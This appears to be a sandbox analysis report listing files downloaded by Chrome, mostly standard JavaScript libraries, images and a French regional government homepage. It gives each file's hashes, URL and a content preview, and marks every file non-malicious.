                                Preview:GIF89a..............................!..NETSCAPE2.0.....!.......,...............0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..0. (...A ...e.zN....x}..e|.}.V...u~.O...v....t..H...k..D.....@....C....?....<.....4....9.............)....&r..."........e....,.....3..e.6......8.........5.b;...5f...x.Mb...,...Q.....=....H....;.....#...Y#. .4K.l53....z..a...0v.:....JL...(.FQ:B....*../ne...VT.(..].....d..[B.[.#.R..W..Dw...+...G..{....b.....)...A.+k.,H...A.V.Zt..+\M....=.[Ox]..l..oo..H.nT.};X-<.U..i.]...9.+x.&.t...7..x+..... .a...$....!oA.Gpw.................'.~!.8....\).-..U. t....a^.aa.O.{.P.?.b%C..`G....C"Q.m..r3|.an.*X.v....3.....o.8.#......Y8K.cc5B.A$......7d.L.kl.d18NYB.@v.ev9h...V.@..g.i....d.j.Re.^...l...$l.....Y&..`..,..Q.*P....bi... .T...D.h..i.Z.J)zb.Q..F..)...Z.......iQ..$.....3..@j'.MH....6qj$. [m.LL.,..n{.4..P..z.n....M.=,[....-tW.Kn-.V.E.R.+...j....j0p.[.L.1..z+?..s.#.{..X..,.gT...H......#..&..1" 'A..+.G.M.,s..Fa.....-.@.R..A..r1.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (4143)
                                Category:downloaded
                                Size (bytes):73015
                                Entropy (8bit):5.342744191670081
                                Encrypted:false
                                SSDEEP:
                                MD5:9BECC40FB1D85D21D0CA38E2F7069511
                                SHA1:AE854B04025DB8B7F48FDD6DEDF41E77EAE44394
                                SHA-256:A9705DFC47C0763380D851AB1801BE6F76019F6B67E40E9B873F8B4A0603F7A9
                                SHA-512:585374E3CE3AB1D28C20FE4B28DA6131A5B353B629332094DB8E5EB4ADE0FF601161B3CAF546F5F1E1BE96353DEAA29109687EAAE098EF279F4A6964430D4035
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js
                                Preview:/**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */.(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.apply(t,r)}function t(n,t,r,e){for(var u=-1,i=null==n?0:n.length;++u<i;){var o=n[u];t(e,o,r(o),n)}return e}function r(n,t){for(var r=-1,e=null==n?0:n.length;++r<e&&t(n[r],r,n)!==!1;);return n}function e(n,t){for(var r=null==n?0:n.length;r--&&t(n[r],r,n)!==!1;);return n}function u(n,t){for(var r=-1,e=null==n?0:n.length;++r<e;)if(!t(n[r],r,n))return!1;.return!0}function i(n,t){for(var r=-1,e=null==n?0:n.length,u=0,i=[];++r<e;){var o=n[r];t(o,r,n)&&(i[u++]=o)}return i}function o(n
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:downloaded
                                Size (bytes):89501
                                Entropy (8bit):5.289893677458563
                                Encrypted:false
                                SSDEEP:
                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (630)
                                Category:downloaded
                                Size (bytes):11741
                                Entropy (8bit):5.081025984716849
                                Encrypted:false
                                SSDEEP:
                                MD5:B4D868755161D10C910A08D2B5E8E82A
                                SHA1:872667F1FBE5AC62D617F88D8EAD744774765D1C
                                SHA-256:536C4D32C0413E181512D11B077A60A056AD6E6F27CDFAE0ED05B8A17F0A63ED
                                SHA-512:81A76760FC4EF87F95269E1DFB8E48318DA27B655E864A8F24419DE76FDE71C33969102BAA60E79B5E25722BCCA7A0D0EC05815606B528E0018D831EE15341E4
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.iledefrance.fr/
                                Preview:..<!DOCTYPE html>.<html lang="fr" dir="ltr" prefix="og: https://ogp.me/ns#">. <head>. <meta charset="utf-8" />.<style>/* @see https://github.com/aFarkas/lazysizes#broken-image-symbol */.js img.lazyload:not([src]) { visibility: hidden; }/* @see https://github.com/aFarkas/lazysizes#automatically-setting-the-sizes-attribute */.js img.lazyloaded[data-sizes=auto] { display: block; width: 100%; }</style>.<script>var _paq = _paq || [];(function(){var u=(("https:" == document.location.protocol) ? "https://stats.iledefrance.fr/" : "http://stats.iledefrance.fr/");_paq.push(["setSiteId", "15"]);_paq.push(["setTrackerUrl", u+"matomo.php"]);_paq.push(["setDoNotTrack", 1]);if (!window.matomo_search_results_active) {_paq.push(["trackPageView"]);}_paq.push(["setIgnoreClasses", ["no-tracking","colorbox"]]);_paq.push(["enableLinkTracking"]);var d=document,g=d.createElement("script"),s=d.getElementsByTagName("script")[0];g.type="text/javascript";g.defer=true;g.async=true;g.src=u+"matomo.js";s.parentN
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:downloaded
                                Size (bytes):32
                                Entropy (8bit):4.226409765557392
                                Encrypted:false
                                SSDEEP:
                                MD5:75FD0092DBCE82A231F7C5CADD761467
                                SHA1:AF095A884D6698AD6483A621B95D5A5E7316A96B
                                SHA-256:C59AE101AB7C0F6198F5A4A14F57D320B138601E0C0E92129FBF194B322B61D6
                                SHA-512:E74B5F519E4F94C44901F209F0C1FFEFA8E25A033AADE8E494C8595CA5295D55D3B3E6DD3289AA62260DC0E4F511824A89436A8439B34E41CF8628BA7B1A3161
                                Malicious:false
                                Reputation:unknown
                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlQBmZb7ds7LhIFDRncHPcSBQ2tCa6x?alt=proto
                                Preview:ChYKBw0Z3Bz3GgAKCw2tCa6xGgQISxgC
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65449)
                                Category:downloaded
                                Size (bytes):93670
                                Entropy (8bit):5.24630291837808
                                Encrypted:false
                                SSDEEP:
                                MD5:FB192338844EFE86EC759A40152FCB8E
                                SHA1:E55DF1F7D6C288EE73D439BAB26DD006FFEE7AF3
                                SHA-256:29296CCACAA9ED35ED168FC51E36F54FD6F8DB9C7786BBF38CC59A27229BA5C2
                                SHA-512:04A6D247E71FCB12DD300B04D2768B45E1522E0F3FA636E07F11E1FE4FE4502F361F2EEBE87B51E612E1A1B6A59F681C4EFCE4CB27A1ADD444763A6C430CB627
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdn.jsdelivr.net/npm/vue@2.6.12
                                Preview:/*!. * Vue.js v2.6.12. * (c) 2014-2020 Evan You. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Vue=t()}(this,function(){"use strict";var e=Object.freeze({});function t(e){return null==e}function n(e){return null!=e}function r(e){return!0===e}function i(e){return"string"==typeof e||"number"==typeof e||"symbol"==typeof e||"boolean"==typeof e}function o(e){return null!==e&&"object"==typeof e}var a=Object.prototype.toString;function s(e){return"[object Object]"===a.call(e)}function c(e){var t=parseFloat(String(e));return t>=0&&Math.floor(t)===t&&isFinite(e)}function u(e){return n(e)&&"function"==typeof e.then&&"function"==typeof e.catch}function l(e){return null==e?"":Array.isArray(e)||s(e)&&e.toString===a?JSON.stringify(e,null,2):String(e)}function f(e){var t=parseFloat(e);return isNaN(t)?e:t}function p(e,t){for(var n=Object.create(null),r=e.split(",")
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                Category:downloaded
                                Size (bytes):14039
                                Entropy (8bit):7.982022577575623
                                Encrypted:false
                                SSDEEP:
                                MD5:D979552FC3D4BAEB70B72A63827678CD
                                SHA1:3C89BEABC2562A85744FC89B68563FA71AC09720
                                SHA-256:31D8D9222E413C11847331F45A6B0A0E7EE17B541916B007B451FEA9DFF049A3
                                SHA-512:452EDD53BA21502A094229965DBBD72C341A49FE788C2B5520274C5CDFBAE1F96A3462AC01A01DDD0BB2384C63C277FF72382E094B857A902B28EE6D2AD61494
                                Malicious:false
                                Reputation:unknown
                                URL:https://logo.clearbit.com/iledefrance.fr
                                Preview:.PNG........IHDR.............L\....6.IDATx....fUu7...{..[..0.....P...(.l...#.W...3.5/.1b0.1o...%$*.D! ....&...0...)..Z.o...a.5.....x.y.........ZD.9.{D{..._......9..ez..{..c.^......9..ez..{..c.^........P.X.!...<.0....^......v.S)l'._x..*6e0l.N.&.V....a..->=.M..a......(....JK......4...K.`.x..x......S..nP./..(Q.....>..... ....0..4J7.._%.l..&....A...5.........5..Z.w}.*Xr.(@.o.]...h...$.....@..$,..3.Q.h...b..V.....i....?.>v..M/i6G.~..,.<|nWs.C.W.`U.!....`.),..../{....x...e.@Mi..#...+}.Q$^_.i...0dV..1.d...>......(..[7...v.z. .. a......1A...#.0{.`.../....0!...7.......*7.BO{........._&.?4..#.|.....e..`..FO....z..`_=..........w.(..(........G ...l@IC..\....#..wv.?..U.#.#..T.n.Kc!@Q..H....pph[=.=.#.8..Uo-xI@*.>...3.w....p.s.3.*...io[..O.b-.L=..!....M...YedS.._*.!P.j........N.# `..c........-z.R..kJ^1h.'_.l~...-..ys...Zc.9...n....3.V..(.S..%...Ot+...6..X...Cw..ho2.....o.....@..n.....5~.w..rW.t._..Oi...81.:.}.?.+...j0..wJ.\0.!q!....FT:.d...7H..u%.9<.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (48664)
                                Category:downloaded
                                Size (bytes):48944
                                Entropy (8bit):5.272507874206726
                                Encrypted:false
                                SSDEEP:
                                MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                Malicious:false
                                Reputation:unknown
                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19015)
                                Category:downloaded
                                Size (bytes):19188
                                Entropy (8bit):5.212814407014048
                                Encrypted:false
                                SSDEEP:
                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:downloaded
                                Size (bytes):25
                                Entropy (8bit):3.6732696895151076
                                Encrypted:false
                                SSDEEP:
                                MD5:A273B53D0A9A7ECCE7E5099471BB3A24
                                SHA1:49BEB7C9EDD58288B47F2F216933A7792CC65863
                                SHA-256:A3C2EFA08FA04B5E92729AF65257604E0066EC68AE95CB9926D8C293CD2BA94F
                                SHA-512:B4762F3F985F15AAC253480011335CF924CF302EB024E7B2424A405BD821EF576D6EA1B676EDD70B1533EE9D7EA915638C6EEA2ECDA3F9456CBC661F5F3812BA
                                Malicious:false
                                Reputation:unknown
                                URL:https://ik.imagekit.io/escrowmade/download__1__OSvF-Qvmk.png
                                Preview:Bandwidth Limit Exceeded
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (14271)
                                Category:downloaded
                                Size (bytes):14355
                                Entropy (8bit):5.154095774619922
                                Encrypted:false
                                SSDEEP:
                                MD5:70489D9432EF978DB53BEBDA3E9F4C14
                                SHA1:F24D0BCC36027BCE45C86ACFBA57B248EDB6A3F9
                                SHA-256:24B9A49D375465E659DBAECB3FDA81FBF0D3EEDBF138E29CB5229E502D8A4FA1
                                SHA-512:6D94B8ED2EEC3CEC648D4FF806DD33AE112D5B1D32D02464844A7C21C9332BE96D89F20813D10C20C4EE4FF984CE820C7B050836BB8304847F8C99DB82EA27A9
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.1/axios.min.js
                                Preview:/* axios v0.21.1 | (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new i(e),n=s(i.prototype.request,t);return o.extend(n,i.prototype,t),o.extend(n,t),n}var o=n(2),s=n(3),i=n(4),a=n(22),u=n(10),c=r(u);c.Axios=i,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),c.isAxiosError=n(26),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefi
                                No static file info